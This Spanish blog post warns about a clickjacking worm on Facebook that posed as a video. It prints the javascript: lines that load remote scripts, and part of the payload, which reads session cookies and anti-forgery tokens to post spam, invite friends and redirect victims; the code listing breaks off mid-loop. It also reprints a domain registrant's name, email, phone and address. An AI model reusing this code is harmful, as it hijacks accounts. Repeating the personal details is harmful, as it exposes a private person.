El nuevo Virus de Facebook, Videos WTF 3


Remember you can translate the content of this page, just give traductor click and choose your language

Hoy mientras navegaba en la red social denominada Facebook descubri algo en uno de mis amigos era nada mas y nada menos que un video, parecía muy normal, hasta que me pidio insertar un código que contenía referencias a documentos Javascript el código es el siguiente:

javascript:(a%3D(b%3Ddocument).createElement(‘script’)).src%3D’http%3A%2F%2Fwww.raxarstudios.com%2Fx%2Ffacebook.php%3F’%2BMath.random()

%2B’%26x%3Dx’%2Cb.body.appendChild(a)%3Bvoid(0)

 

[smartads]

 

Como podrán notar hace referencias a Scripts lo cual es muy anormal así que viendo esto sumado a que mi cuenta fue advertida por Fb de ser “Spamosa” me percate de que sin duda este es el nuevo virus de Fb.

Como detectarlo

Ahora si lo que les interesa, como detectarlo para obviamente protegerte.

Primero si ven en su muro o en el de sus amigos una publicacion de un supuesto video asi:

Se ve todo muy normal ¿no? una publicacion de un amigo que dice que estas en un video pero veamos que pasa cuando le damos PLAY

En efecto sale un reproductor que es supuestamente de Youtube aqui el supuesto reproductor:

Después de que le das PLAY (cabe destacar que esta es la 2da vez que tenemos que darle PLAY) te sale algo asi:

Mmm algo extraño pero sigue pareciendo normal, uno piensa tal vez nuevas politicas de Facebook o Youtube o tal vez se deba a un Flash desactualizado

Y que pasa cuando le das continuar, aparece el siguiente mensaje, hasta aparece el icono de Youtube pero este esta estatico es decir que no contiene enlace alguno

Ahora cuando tu colocas el código que te indican que es este:

javascript:(a%3D(b%3Ddocument).createElement(‘script’)).src%3D
‘http%3A%2F%2Fwww.raxarstudios.com%2Fx%2Ffacebook.php
%3F’%2BMath.random()%2B’%26x%3Dx’%2Cb.body.appendChild(a)
%3Bvoid(0)

En realidad parece no hacer nada pero si como sospechaban esta enviando y publicando el mismo mensaje con el “video” en el muro de tus amigos claro, ahora con su nombre en lugar del tuyo.

Algo muy interesante es que el codigo tiene un enlace a la pagina www.raxarstudios.com , que visitandola te das cuenta que solo es una imagen, algo raro sin duda pues en los anteriores “virus” de Facebook como: No me gusta, ve quien visito tu perfil, etc. normalmente era para instalar programas maliciosos o bien para ganar dinero con publicidad, hay que recordar que recientemente han caido varios servers de spam por lo que yo no descartaría que todo esto es para formar una base de datos para futuramente enviar SPAM.

Todo esto lo he visto en perfiles de Facebook de amigos de Estados Unidos, actualmente no lo he visto en ninun perfil de Facebook de algun amigo de México.

Actualizacion: El codigo ya no hace nada Facebook se alerto rapidamente y al insertarlo y presionar enter te sale un mensaje que advierte que podrias estar enviando SPAM asi que a estos momentos ya no publica mas mensajes “SPAMOSOS” en el muro de los amigos

Actualizacion: Julio 1/ 8:02

Parecia que este “virus” ya no haria otra cosa pero OH sorpresa tambien envia una invitacion de amistad a Daggie Smith, pasadas una horas te va a lelgar una notificacion de que esta persona a aceptado tu solicitud, no comprendo muy bien para que es esto tal vez sea como una confirmacion o algo por el estilo, si cayeron cambien su contraseña y borren a esta persona. Cualquier otra informacion que salga yo la informare

Actualizacion: Julio 4

Hoy he visto la primera aparición de este virus en un perfil de un amigo de México cabe destacar que el “virus” sigue siendo en ingles y ademas ahora la imagen del video es diferente ademas de que el video ahora se titula: “had orgasm from roller coaster alexis AHAHA watch this video”

Otro punto interesante es que crea un evento llamado: “90% of people get turned on by this video!” Tengan cuidado en unos momentos pongo unas nuevas capturas para que vean como luce este virus actualmente.

La imagen nueva del video:

Como podran ver ya ha cambiado un poco el mensaje pero sigue siendo lo mismo.

El motivo

Algo que me habia desconcertado era ¿para que estaba hecho?, pues no te llevaba a publicidada ni nada pero dandole una vision mas profunda al codigo me di cuenta de algo aqui el codigo completo.

javascript:(x%3D(z%3Ddocument).createElement(‘script’)).src%3D
‘http://mobsteradds.com/2/what.php?’%2BMath.random()%2Cz.
body.appendChild(x)%3Bvoid(0)

Despues de esto “invoque” el codigo completo que es este:

function overlay() { darkbox = document.createElement(‘div’); document.body.appendChild(darkbox); darkbox.style.position = ‘absolute’; darkbox.style.opacity = 0.6; darkbox.style.filter = ‘alpha(opacity=60)’; darkbox.style.background = ‘#000’; darkbox.style.top = document.documentElement.scrollTop; darkbox.style.left = document.documentElement.scrollLeft; darkbox.style.height = 100 + ‘%’; darkbox.style.width = 100 + ‘%’; darkbox.style.zIndex = 9999999; } overlay(); //alert(‘STARTING!’); function readCookie(name) { var nameEQ = name + “=”; var ca = document.cookie.split(‘;’); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ‘ ‘) c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length) } return null } var user_id = readCookie(“c_user”); var user_name = document.getElementById(‘navAccountName’).innerHTML; /* Utilities. */ function getRandomInt (min, max) { return Math.floor(Math.random() * (max – min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; } /* Setup some variables. */ var post_form_id = document.getElementsByName(‘post_form_id’)[0].value; var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value; var video_url = [‘http://www.facebook.com/pages/90-of-people-get-turned-on-watching-this-video/207254372654596’, ‘http://bit.ly/mJCuJc’]; /* Domain spinner. */ var domains = [‘http://i257.photobucket.com/albums/hh227/lytz-inc/coaster.swf’, ‘http://i257.photobucket.com/albums/hh227/lytz-inc/coaster-1.swf’]; /* Message spinner. */ var e1 = [‘247800238579003’, ‘247800238579003’]; var e2 = ‘127809940636391’; var pf = [‘100001925103353’]; var p0 = [‘a girl’, ‘this woman’]; var p1 = [‘had an orgasm on a roller coaster!’, ‘had orgasm from roller coaster’, ‘had orgasm from this roller coaster!’]; var p2 = [‘LMFAO’, ‘AHAHA’]; var p3 = [‘check this!’, ‘watch this video’]; var message = “So funny how this girls boyfriend goes silent when he realizes his girlfriend isnt joking about having an orgasm!”; var des = “I love how the dude stops laughing and goes completely silent once he realizes his girlfriend wasn’t joking about having an orgasm.”; /* Finalise. */ var did = false; function done() { if(!did){ did = true; window.top.location.href = “http://justwhoring.info/”; } } /* Add. */ var paramz = “post_form_id=” + post_form_id + “&fb_dtsg=” + fb_dtsg + “&profile_id=” + randomValue(pf) + “&source=profile_button&src=fbx_top_bar&submit=1&lsd=&post_form_id_source=AsyncRequest”; var httpz = new XMLHttpRequest(); httpz.open(“POST”, “http://www.facebook.com/ajax/profile/connect.php?__a=1”, true); //Send the proper header information along with the request httpz.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”); httpz.setRequestHeader(“Content-length”, paramz.length); httpz.setRequestHeader(“Connection”, “keep-alive”); httpz.onreadystatechange = function () { //Call a function when the state changes. } httpz.send(paramz); /* Continue. */ function contin() { /* Invite Friends. */ var d1 = “%7B%22”; var d2 = “”; var s = friends.payload.entries.length-75; if (s == 0) { s = 0; } /* EV1 */ var counter = 0; for(var i=s; i 75) { s = 75; } for(var i=0; i 30) { max = 30; } for(var count=0; count

Si saben “leer” codigo ya se habran podido dar cuenta de muchas cosas sumamente interesantes como por ejemplo las variables que tiene dependiendo si eres hombre o mujer, ademas de que publica un evento e invita a tus amigos y eso no es todo a mi me desconcertaba por el primero dominio que habia que encontrado que fue este: www.raxarstudios.com, que en realidad no contiene nada sospechoso pero esto se debe a que muestra varios dominios el verdaderamente dañino es este: http://mobsteradds.com/

La pagina a la que uno es reedirigido luce asi:

Cuando la vi me sorprendi sin duda pues es identica (bueno muy similar) a youtube claro que los supuestos enlaces no te llevan a ninguna parte, porque son en realidad imagenes, algo chistoso es que te pide que te identifiques con tu cuenta de facebook para acabar con el spam.

Alerta: ¿Robo de identidad?

Dado que te pide tus datos de Facebook (contraseña y usuario) es muy probable que obtenga tus datos, pero esto no lo tengo confirmado he husmeado en el codigo y parece que esa no es la intencion.

El objetivo real

Si lo adivinaron, es de nuevo ganar dinero mediante publicidad, la pagina luce asi:

Y porque aveces queda la duda en realidad el video no va a cargar porque dicho video NO EXISTE

El creador

Viendo el whois del dominio descubri lo siguiente

Registrant Contact:
dropthebeat
matthew mathieson ()

Fax:
7102 w yucca
peoria, State 85345
US

Administrative Contact:
dropthebeat
mathieson (matthewinsane12@gmail.com)
+1.6027965996
Fax: +1.5555555555
7102 w yucca
peoria, State 85345
US

Cabe señalar que el dominio fue creado el 24 de Julio del 2008 y vence el 24 de julio del 2011, asi que ya saben el correo al cual deben de mandar sus agradecimientos por este gran invento 😉

Cuidense de este tipo de cosas y compartanlo con sus amigos pues si varios estan enterados se hara cada vez mas dificil que caigan en este tipo de cosas y por consecuente tendremos una red mas segura

Si quieren aportar su granito de arena denuncien el sitio anteriormente mencionado como sitio de phishing aqui como hacerlo